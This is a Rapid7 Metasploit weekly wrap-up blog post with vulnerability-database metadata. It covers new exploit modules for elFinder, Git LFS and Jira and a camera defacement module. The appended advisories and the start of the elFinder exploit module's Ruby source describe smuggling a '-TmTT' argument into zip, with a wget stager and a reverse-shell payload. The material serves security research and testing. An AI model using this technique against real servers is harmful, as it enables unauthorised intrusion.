Metasploit Wrap-Up

2021-09-17T19:59:18

Description

![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/09/image.png) ## Clone your way to code execution ![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/09/metasploit-sky-2.png) We’ve had a busy week bringing you exploits, features, enhancements, and fixes. Exploit modules for Git and El Finder lead the pack this week with an information disclosure against Jira and a post exploitation module targeting Geutebruck white-labelled cameras to freeze them like every movie ever! ## Git push upstream git-lfs:payload Our own Jack Hysel and Shelby Pace had some fun creating an exploit module targeting Github, originally discovered by Dawid Golunski. The exploit requires a user to clone an infected Github repository to gain remote code execution, and before you ask, we promise it is safe to clone ours. ## Jira users Brian Halbach and Mikhail Klyuchnikov sent us a nice module exploiting [CVE-2020-14181](<https://attackerkb.com/topics/oIM3R25bFH/cve-2020-14181?referrer=blog>) to get a list of Jira users, helping those social engineers among us to get more targets or login scanners more data. Unfortunately, it does not track my tickets and keep them up to date. ## New module content (4) * [Jira Users Enumeration](<https://github.com/rapid7/metasploit-framework/pull/14631>) by Brian Halbach and Mikhail Klyuchnikov, which exploits [CVE-2020-14181](<https://attackerkb.com/topics/oIM3R25bFH/cve-2020-14181?referrer=blog>) \- This obtains user names on Jira Server by exploiting an information disclosure vulnerability that exists at the `/ViewUserHover.jspa` endpoint. * [elFinder Archive Command Injection](<https://github.com/rapid7/metasploit-framework/pull/15658>) by Shelby Pace and Thomas Chauchefoin, which exploits [CVE-2021-32682](<https://attackerkb.com/topics/llBeWZGXq9/cve-2021-32682?referrer=blog>) \- This adds an exploit for CVE-2021-32682 which is an unauthenticated RCE in the elFinder PHP application. The vulnerability is due to a flaw that allows a malicious argument to be passed to the zip command when an archive action is performed. * [Git Remote Code Execution via git-lfs (CVE-2020-27955)](<https://github.com/rapid7/metasploit-framework/pull/15624>) by Dawid Golunski, [jheysel-r7](<https://github.com/jheysel-r7>), and [space-r7](<https://github.com/space-r7>), which exploits [CVE-2020-27955](<https://attackerkb.com/topics/33ELRpbDyL/cve-2020-27955-git-large-file-storage-git-lfs-git-lfs---remote-code-execution-rce?referrer=blog>) \- This adds an exploit for CVE-2020-27955 which is a vulnerability in the Git version control system. The module can be used to execute code in the context of a user that can be convinced to clone a malicious repository. * [Geutebruck Camera Deface](<https://github.com/rapid7/metasploit-framework/pull/15601>) by Ibrahim Ayadhi and Sébastien Charbonnier - A new post exploitation module has been added which allows one to take a session on a Geutebruck Camera shell and either freeze the current display stream, replace the current display stream with a static image, or restore the display stream such that it will display the current live feed from the camera. ## Enhancements and features * [#15609](<https://github.com/rapid7/metasploit-framework/pull/15609>) from [adfoster-r7](<https://github.com/adfoster-r7>) \- Adds additional metadata to exploit modules to specify Meterpreter command requirements. This information is used to add a descriptive warning when running modules with a Meterpreter implementation that doesn't support the required command functionality. * [#15674](<https://github.com/rapid7/metasploit-framework/pull/15674>) from [digininja](<https://github.com/digininja>) \- Updates the Apache Tomcat Ghostcat module to correctly handle a larger range of possible success status codes when verifying if the module has succeeded ## Bugs fixed * [#15667](<https://github.com/rapid7/metasploit-framework/pull/15667>) from [bwatters-r7](<https://github.com/bwatters-r7>) \- Fix powershell_reverse_tcp file operations and update the file operations test module ## Get it As always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub: * [Pull Requests 6.1.5...6.1.6](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-09-08T18%3A07%3A57-05%3A00..2021-09-15T14%3A13%3A18-05%3A00%22>) * [Full diff 6.1.5...6.1.6](<https://github.com/rapid7/metasploit-framework/compare/6.1.5...6.1.6>) If you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition). * _Image credit: Toni Barros from São Paulo, Brasil - Hello, Dolly!, CC BY-SA 2.0 <https://creativecommons.org/licenses/by-sa/2.0>, via Wikimedia Commons_

{"id": "RAPID7BLOG:30F8EDB723C29FCCD04238CA5385CB84", "type": "rapid7blog", "bulletinFamily": "info", "title": "Metasploit Wrap-Up", "description": "![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/09/image.png)\n\n## Clone your way to code execution\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/09/metasploit-sky-2.png)\n\nWe\u2019ve had a busy week bringing you exploits, features, enhancements, and fixes. Exploit modules for Git and El Finder lead the pack this week with an information disclosure against Jira and a post exploitation module targeting Geutebruck white-labelled cameras to freeze them like every movie ever!\n\n## Git push upstream git-lfs:payload\n\nOur own Jack Hysel and Shelby Pace had some fun creating an exploit module targeting Github, originally discovered by Dawid Golunski. The exploit requires a user to clone an infected Github repository to gain remote code execution, and before you ask, we promise it is safe to clone ours.\n\n## Jira users\n\nBrian Halbach and Mikhail Klyuchnikov sent us a nice module exploiting [CVE-2020-14181](<https://attackerkb.com/topics/oIM3R25bFH/cve-2020-14181?referrer=blog>) to get a list of Jira users, helping those social engineers among us to get more targets or login scanners more data. Unfortunately, it does not track my tickets and keep them up to date.\n\n## New module content (4)\n\n * [Jira Users Enumeration](<https://github.com/rapid7/metasploit-framework/pull/14631>) by Brian Halbach and Mikhail Klyuchnikov, which exploits [CVE-2020-14181](<https://attackerkb.com/topics/oIM3R25bFH/cve-2020-14181?referrer=blog>) \\- This obtains user names on Jira Server by exploiting an information disclosure vulnerability that exists at the `/ViewUserHover.jspa` endpoint.\n * [elFinder Archive Command Injection](<https://github.com/rapid7/metasploit-framework/pull/15658>) by Shelby Pace and Thomas Chauchefoin, which exploits [CVE-2021-32682](<https://attackerkb.com/topics/llBeWZGXq9/cve-2021-32682?referrer=blog>) \\- This adds an exploit for CVE-2021-32682 which is an unauthenticated RCE in the elFinder PHP application. The vulnerability is due to a flaw that allows a malicious argument to be passed to the zip command when an archive action is performed.\n * [Git Remote Code Execution via git-lfs (CVE-2020-27955)](<https://github.com/rapid7/metasploit-framework/pull/15624>) by Dawid Golunski, [jheysel-r7](<https://github.com/jheysel-r7>), and [space-r7](<https://github.com/space-r7>), which exploits [CVE-2020-27955](<https://attackerkb.com/topics/33ELRpbDyL/cve-2020-27955-git-large-file-storage-git-lfs-git-lfs---remote-code-execution-rce?referrer=blog>) \\- This adds an exploit for CVE-2020-27955 which is a vulnerability in the Git version control system. The module can be used to execute code in the context of a user that can be convinced to clone a malicious repository.\n * [Geutebruck Camera Deface](<https://github.com/rapid7/metasploit-framework/pull/15601>) by Ibrahim Ayadhi and S\u00e9bastien Charbonnier - A new post exploitation module has been added which allows one to take a session on a Geutebruck Camera shell and either freeze the current display stream, replace the current display stream with a static image, or restore the display stream such that it will display the current live feed from the camera.\n\n## Enhancements and features\n\n * [#15609](<https://github.com/rapid7/metasploit-framework/pull/15609>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Adds additional metadata to exploit modules to specify Meterpreter command requirements. This information is used to add a descriptive warning when running modules with a Meterpreter implementation that doesn't support the required command functionality.\n * [#15674](<https://github.com/rapid7/metasploit-framework/pull/15674>) from [digininja](<https://github.com/digininja>) \\- Updates the Apache Tomcat Ghostcat module to correctly handle a larger range of possible success status codes when verifying if the module has succeeded\n\n## Bugs fixed\n\n * [#15667](<https://github.com/rapid7/metasploit-framework/pull/15667>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- Fix powershell_reverse_tcp file operations and update the file operations test module\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.5...6.1.6](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-09-08T18%3A07%3A57-05%3A00..2021-09-15T14%3A13%3A18-05%3A00%22>)\n * [Full diff 6.1.5...6.1.6](<https://github.com/rapid7/metasploit-framework/compare/6.1.5...6.1.6>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).\n\n * _Image credit: Toni Barros from S\u00e3o Paulo, Brasil - Hello, Dolly!, CC BY-SA 2.0 <https://creativecommons.org/licenses/by-sa/2.0>, via Wikimedia Commons_", "published": "2021-09-17T19:59:18", "modified": "2021-09-17T19:59:18", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://blog.rapid7.com/2021/09/17/metasploit-wrap-up-130/", "reporter": "Brendan Watters", "references": [], "cvelist": ["CVE-2020-14181", "CVE-2020-27955", "CVE-2021-32682"], "immutableFields": [], "lastseen": "2021-09-17T21:01:48", "viewCount": 43, "enchantments": {"dependencies": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:BAM-21267", "ATLASSIAN:BAM-21284", "ATLASSIAN:JRASERVER-71536", "ATLASSIAN:JRASERVER-71560", "ATLASSIAN:SRCTREEWIN-13410", "ATLASSIAN:SRCTREEWIN-13480", "BAM-21267", "BAM-21284", "JRASERVER-71536", "JRASERVER-71560", "SRCTREEWIN-13410", "SRCTREEWIN-13480"]}, {"type": "attackerkb", "idList": ["AKB:0E7B1AC9-8AA4-4E6C-BB8C-A92654F9F59D"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-1107", "CPAI-2020-1222", "CPAI-2021-1018"]}, {"type": "cve", "idList": ["CVE-2020-14181", "CVE-2020-27955", "CVE-2021-21237", "CVE-2021-32682", "CVE-2022-0403"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-27955", "DEBIANCVE:CVE-2021-21237"]}, {"type": "exploitdb", "idList": ["EDB-ID:49633"]}, {"type": "github", "idList": ["GHSA-4G4P-42WC-9F3M", "GHSA-CX3W-XQMC-84G5", "GHSA-WPH3-44RJ-92PR"]}, {"type": "githubexploit", "idList": ["12E6F100-A1FF-594C-99C4-DB7C8CE01C78", "161C23A4-C55D-51E1-879C-C0118D1D6700", "30298115-342F-55E1-9EAC-729DC1B3D181", "4B231570-F0E2-58B6-8CC3-9375EA7D545C", "78AAAA4C-FD3D-5AE7-B155-5E7646CA947E", "8C51F794-A253-5F1E-B5D0-0B1213520826", "A542A2D9-7FFB-5124-B36F-4F110A2146F2", "A7786E83-AFF8-5B96-9254-7E1040916083", "D56AA8A3-479D-504C-8FD5-DDF516063BD9", "DBF83092-127A-57DA-9F19-F1D868B01365", "FF9E9079-09ED-5DA5-A816-5FEB139C03E5", "FFCE0773-643A-5405-B466-F165D1B6EA7C"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-HTTP-GIT_LFS_RCE-"]}, {"type": "nessus", "idList": ["JIRA_8_12_0_JRASERVER-71560.NASL", "WEB_APPLICATION_SCANNING_112853", "WEB_APPLICATION_SCANNING_112854", "WEB_APPLICATION_SCANNING_112855"]}, {"type": "osv", "idList": ["OSV:GHSA-4G4P-42WC-9F3M", "OSV:GHSA-CX3W-XQMC-84G5", "OSV:GHSA-WPH3-44RJ-92PR"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159923", "PACKETSTORM:161730", "PACKETSTORM:164173", "PACKETSTORM:164180"]}, {"type": "sonarsource", "idList": ["SONARSOURCE:82C920BF6FA095A2CE2867D1EBDCCC6E"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-27955", "UB:CVE-2021-21237"]}, {"type": "veracode", "idList": ["VERACODE:34211"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:1493380EEC54B493CC22B4FA116139BB"]}, {"type": "wpexploit", "idList": ["WPEX-ID:997A7FBF-98C6-453E-AD84-75C1E91D5A1E"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:997A7FBF-98C6-453E-AD84-75C1E91D5A1E"]}, {"type": "zdt", "idList": ["1337DAY-ID-35186", "1337DAY-ID-35926", "1337DAY-ID-36761", "1337DAY-ID-36763"]}]}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-71536", "ATLASSIAN:SRCTREEWIN-13410", "ATLASSIAN:SRCTREEWIN-13480"]}, {"type": "attackerkb", "idList": ["AKB:0E7B1AC9-8AA4-4E6C-BB8C-A92654F9F59D"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-1107", "CPAI-2020-1222"]}, {"type": "cve", "idList": ["CVE-2020-14181", "CVE-2020-27955", "CVE-2021-32682"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-27955"]}, {"type": "exploitdb", "idList": ["EDB-ID:49633"]}, {"type": "github", "idList": ["GHSA-WPH3-44RJ-92PR"]}, {"type": "githubexploit", "idList": ["12E6F100-A1FF-594C-99C4-DB7C8CE01C78", "161C23A4-C55D-51E1-879C-C0118D1D6700", "30298115-342F-55E1-9EAC-729DC1B3D181", "4B231570-F0E2-58B6-8CC3-9375EA7D545C", "78AAAA4C-FD3D-5AE7-B155-5E7646CA947E", "8C51F794-A253-5F1E-B5D0-0B1213520826", "A542A2D9-7FFB-5124-B36F-4F110A2146F2", "A7786E83-AFF8-5B96-9254-7E1040916083", "D56AA8A3-479D-504C-8FD5-DDF516063BD9", "DBF83092-127A-57DA-9F19-F1D868B01365", "FFCE0773-643A-5405-B466-F165D1B6EA7C"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/GIT_LFS_RCE/"]}, {"type": "nessus", "idList": ["JIRA_8_12_0_JRASERVER-71560.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159923", "PACKETSTORM:161730"]}, {"type": "sonarsource", "idList": ["SONARSOURCE:82C920BF6FA095A2CE2867D1EBDCCC6E"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-27955"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:1493380EEC54B493CC22B4FA116139BB"]}, {"type": "zdt", "idList": ["1337DAY-ID-35186", "1337DAY-ID-35926"]}]}, "exploitation": null, "vulnersScore": 0.1}, "_state": {"dependencies": 1660004461, "score": 1659915190}, "_internal": {"score_hash": "c687ce71c5672795e0ba07cd322c87cb"}}

{"checkpoint_advisories": [{"lastseen": "2022-02-16T19:29:57", "description": "A command injection vulnerability exists in ElFinder. The vulnerability is due to insufficient validation of the file name when creating an archive.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-30T00:00:00", "type": "checkpoint_advisories", "title": "ElFinder File Manager Command Injection (CVE-2021-32682)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32682"], "modified": "2021-12-30T00:00:00", "id": "CPAI-2021-1018", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:37:11", "description": "An information disclosure vulnerability exists in Atlassian Jira. Successful exploitation of this vulnerability would allow a remote attacker to obtain sensitive information.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2020-11-05T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Jira Server Information Disclosure (CVE-2020-14181)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14181"], "modified": "2020-11-05T00:00:00", "id": "CPAI-2020-1107", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-02-16T19:36:52", "description": "A remote code execution vulnerability exists in Git LFS. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-28T00:00:00", "type": "checkpoint_advisories", "title": "Git LFS Remote Code Execution (CVE-2020-27955)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2020-11-28T00:00:00", "id": "CPAI-2020-1222", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "github": [{"lastseen": "2022-08-11T02:02:22", "description": "### Impact\n\nWe recently fixed several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with the minimal configuration. \n\n### Patches\n\nThe issues were addressed in our last release, 2.1.59. \n\n### Workarounds\n\nIf you can't update to 2.1.59, make sure your connector is not exposed without authentication.\n\n### Reference\n\nFurther technical details will be disclosed on https://blog.sonarsource.com/tag/security after some time.\n\n### For more information\n\nIf you have any questions or comments about this advisory, you can contact:\n - The original reporters, by sending an email to vulnerability.research@sonarsource.com;\n - The maintainers, by opening an issue on this repository.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-16T17:04:29", "type": "github", "title": "elFinder before 2.1.59 contains multiple vulnerabilities leading to RCE", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32682"], "modified": "2022-08-11T00:02:01", "id": "GHSA-WPH3-44RJ-92PR", "href": "https://github.com/advisories/GHSA-wph3-44rj-92pr", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-13T20:32:47", "description": "### Impact\nOn Windows, if Git LFS operates on a malicious repository with a `git.bat` or `git.exe` file in the current directory, that program would be executed, permitting the attacker to execute arbitrary code. This does not affect Unix systems.\n\nThis occurs because on Windows, Go includes (and prefers) the current directory when the name of a command run does not contain a directory separator.\n\n### Patches\nThis version should be patched in v2.12.1, which will be released in coordination with this security advisory.\n\n### Workarounds\nOther than avoiding untrusted repositories, there is no workaround.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Start a discussion in [the Git LFS discussion page](https://github.com/git-lfs/git-lfs/discussions).\n* If you cannot open a discussion, please email the core team using their usernames at `github.com`.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-11T23:39:18", "type": "github", "title": "Git LFS can execute a Git binary from the current directory", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2022-05-13T18:50:25", "id": "GHSA-4G4P-42WC-9F3M", "href": "https://github.com/advisories/GHSA-4g4p-42wc-9f3m", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-13T20:32:46", "description": "### Impact\nOn Windows, if Git LFS operates on a malicious repository with a git.bat or git.exe file in the current directory, that program would be executed, permitting the attacker to execute arbitrary code. This does not affect Unix systems.\n\nThis is the result of an incomplete fix for CVE-2020-27955.\n\nThis issue occurs because on Windows, [Go includes (and prefers) the current directory when the name of a command run does not contain a directory separator](https://github.com/golang/go/issues/38736).\n\n### Patches\nThis version should be patched in v2.13.2, which will be released in coordination with this security advisory.\n\n### Workarounds\nOther than avoiding untrusted repositories or using a different operating system, there is no workaround.\n\n### References\n_Are there any links users can visit to find out more?_\n\n### For more information\nIf you have any questions or comments about this advisory:\n\n- Start a discussion in [the Git LFS discussion page](https://github.com/git-lfs/git-lfs/discussions).\n- If you cannot open a discussion, please email the core team using their usernames at `github.com`.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-15T00:30:37", "type": "github", "title": "Git LFS can execute a Git binary from the current directory on Windows", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": "2022-05-13T18:50:25", "id": "GHSA-CX3W-XQMC-84G5", "href": "https://github.com/advisories/GHSA-cx3w-xqmc-84g5", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-09-15T15:29:15", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-15T00:00:00", "type": "packetstorm", "title": "elFinder Archive Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32682"], "modified": "2021-09-15T00:00:00", "id": "PACKETSTORM:164173", "href": "https://packetstormsecurity.com/files/164173/elFinder-Archive-Command-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'elFinder Archive Command Injection', \n'Description' => %q{ \nelFinder versions below 2.1.59 are vulnerable to a command injection \nvulnerability via its archive functionality. \n \nWhen creating a new zip archive, the `name` parameter is sanitized \nwith the `escapeshellarg()` php function and then passed to the \n`zip` utility. Despite the sanitization, supplying the `-TmTT` \nargument as part of the `name` parameter is still permitted and \nenables the execution of arbitrary commands as the `www-data` user. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Thomas Chauchefoin', # Discovery \n'Shelby Pace' # Metasploit module \n], \n'References' => [ \n[ 'CVE', '2021-32682' ], \n[ 'URL', 'https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities' ] \n], \n'Platform' => [ 'linux' ], \n'Privileged' => false, \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'Targets' => [ \n[ \n'Automatic Target', \n{ \n'Platform' => 'linux', \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'CmdStagerFlavor' => [ 'wget' ], \n'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' } \n} \n] \n], \n'DisclosureDate' => '2021-06-13', \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [ CRASH_SAFE ], \n'Reliability' => [ REPEATABLE_SESSION ], \n'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ] \n} \n) \n) \n \nregister_options([ OptString.new('TARGETURI', [ true, 'The URI of elFinder', '/' ]) ]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => upload_uri \n) \n \nreturn CheckCode::Unknown('Failed to retrieve a response') unless res \nreturn CheckCode::Safe('Failed to detect elFinder') unless 